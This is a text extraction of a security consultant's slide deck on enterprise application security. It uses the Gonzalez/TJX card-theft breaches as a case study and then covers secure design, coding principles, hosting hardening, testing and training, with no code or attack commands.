Application Security –Enterprise Strategies
K. K. Mookhey, CISA, CISSP, CISM
www.niiconsulting.com
K. K. Mookhey, CISA, CISSP, CISMPrincipal Consultant
Agenda
� The Biggest Hack in History
� How the Cookie Crumbles?
www.niiconsulting.com
� Answers!
Speaker Introduction
� Founder & Principal Consultant, Network Intelligence
� Speaker at Blackhat 2004, Interop 2005, IT Underground 2005, OWASP Asia 2008,2009
� Co-author of book on Metasploit Framework
www.niiconsulting.com
� Co-author of book on Metasploit Framework (Syngress), Linux Security & Controls (ISACA)
� Author of numerous articles on SecurityFocus, IT Audit, IS Controls (ISACA)
� Conducted numerous pen-tests, application security assessments, forensics, etc.
www.niiconsulting.com
THE BIGGEST HACK IN HISTORY
Gonzalez, TJX and Heart-break-land
� >200 million credit card number stolen
� Heartland Payment Systems, TJX, and 2 US national retailers hacked
� Modus operandi
� Visit retail stores to understand workings
www.niiconsulting.com
� Visit retail stores to understand workings
� Analyze websites for vulnerabilities
� Hack in using SQL injection
� Inject malware
� Sniff for card numbers and details
� Hide tracks
The hacker underground
� Albert Gonzalez
� a/k/a “segvec,”
� a/k/a “soupnazi,”
� a/k/a “j4guar17”
� Malware, scripts and hacked data hosted on servers in:
www.niiconsulting.com
� Malware, scripts and hacked data hosted on servers in:
� Latvia
� Netherlands
� IRC chats
� March 2007: Gonzalez “planning my second phase against Hannaford”
� December 2007: Hacker P.T. “that’s how [HACKER 2] hacked Hannaford.”
UkraineNew JerseyCalifornia
Where does all this end up?
IRC Channels#cc#ccards#ccinfo#ccpower#ccs#masterccs
www.niiconsulting.com
� Commands used on IRC
� !cardable
� !cc, !cclimit, !chk, !cvv2, !exploit, !order.log, !proxychk
#masterccs#thacc#thecc#virgincc
TJX direct costs
$24 million to
$41 million to Visa
$200 million in fines/penalties
www.niiconsulting.com
$24 million to Mastercard
Cost of an incident
� $6.6 million average cost of a data breach
� From this, cost of lost business is $4.6 million
� More than $200 per compromised record
www.niiconsulting.com
On the other hand:
� Fixing a bug costs $400 to $4000
� Cost increases exponentially as time lapses
How the Cookie Crumbles
www.niiconsulting.com
www.niiconsulting.com
www.niiconsulting.com
www.niiconsulting.com
www.niiconsulting.com
www.niiconsulting.com
www.niiconsulting.com
www.niiconsulting.com
www.niiconsulting.com
www.niiconsulting.com
www.niiconsulting.com
Betting blind!
� DB Name
� Table Names
� User IDs
� Table Structure
� Data
www.niiconsulting.com
� Data
Net Result
www.niiconsulting.com
Enterprise Owned!
Other aspects
www.niiconsulting.com
• App2App interaction requires an authentication process
– Calling application needs to send credentials to target application
• Common use cases
– Applications and Scripts connecting to databases
– 3rd Party Products accessing network resources
App2App Communication
www.niiconsulting.com
– 3rd Party Products accessing network resources
– Job Scheduling
– Application Server Connection Pools
– Distributed Computing Centers
– Application Encryption Key Management
– ATM, Kiosks, etc.
Answers!
www.niiconsulting.com
Technology Solutions
� Web Application Firewalls
� Privileged Identity Management Suites
www.niiconsulting.com
� Application-Aware Firewalls
� Application-Aware SIEMS
� Database Access Management Solutions
Before we get to the technology…
www.niiconsulting.com
Design
Application Security – Holistic Solution
www.niiconsulting.com
Develop/
Manage
Test
Train
Secure Design
� Secure Designing Models
� Client Inputs
� Client Education
www.niiconsulting.com
� Client Education
� Threat Modeling
� Vulnerability Classification – STRIDE
� Risk Classification – DREAD
Microsoft’s Threat Modeling Tool
www.niiconsulting.com
Secure Coding Overview
Secure coding isn’t taught in school
� Homeland Security's Build Security In Maturity Model (BSIMM)
� Microsoft's Security Development Lifecycle
www.niiconsulting.com
� Microsoft's Security Development Lifecycle (SDL)
� OpenSAMM (Software Assurance Maturity Model)
� OWASP Secure Coding Guides
Secure Coding Principles
1. Minimize attack surface area
2. Establish secure defaults
3. Principle of least privilege
4. Principle of defense in depth
5. Fail securely
www.niiconsulting.com
5. Fail securely
6. Don’t trust input – user or services
7. Separation of duties
8. Avoid security by obscurity
9. Keep security simple
10.Fix security issues correctly
Vendor Management
� Big names != Good security
� Contractual weaknesses
www.niiconsulting.com
� Lack of vendor oversight
� No penalties for blatantly buggy code!
Secure Hosting
� Web Security
� Secured web server
� Secured application server –all components
� Web application firewalls
� Database Security
� OS Security
� Security Patches
� Users and Groups
� Access Control
� Security Policies
� Secured Login
www.niiconsulting.com
� Database Security
� Security Patches
� Users and Roles
� Access Control
� Logging
� Password Security
� Database Table Encryption
� Data Masking
� Secured Login
� Logging
Secure Testing
� Security testing options
� Blackbox
� Greybox
� Whitebox
� Source Code Review
www.niiconsulting.com
� OWASP Top Ten (www.owasp.org)
� OWASP Testing Guide
Tools of the tradeOpen source – Wikto, Paros, Webscarab, Firefox pluginsCommercial – Acunetix, Cenzic, Netsparker, Burpsuite
Training
� Back to basics
� Natural thought process
www.niiconsulting.com
� Look at larger picture
� Make it fun
� Giving back to the community
Design
Application Security Vision
www.niiconsulting.com
Develop/
Manage
Test
Train
Thank you!Questions?
Information Security Institute of Information
www.niiconsulting.com
Information Security Consulting Services
Institute of Information Security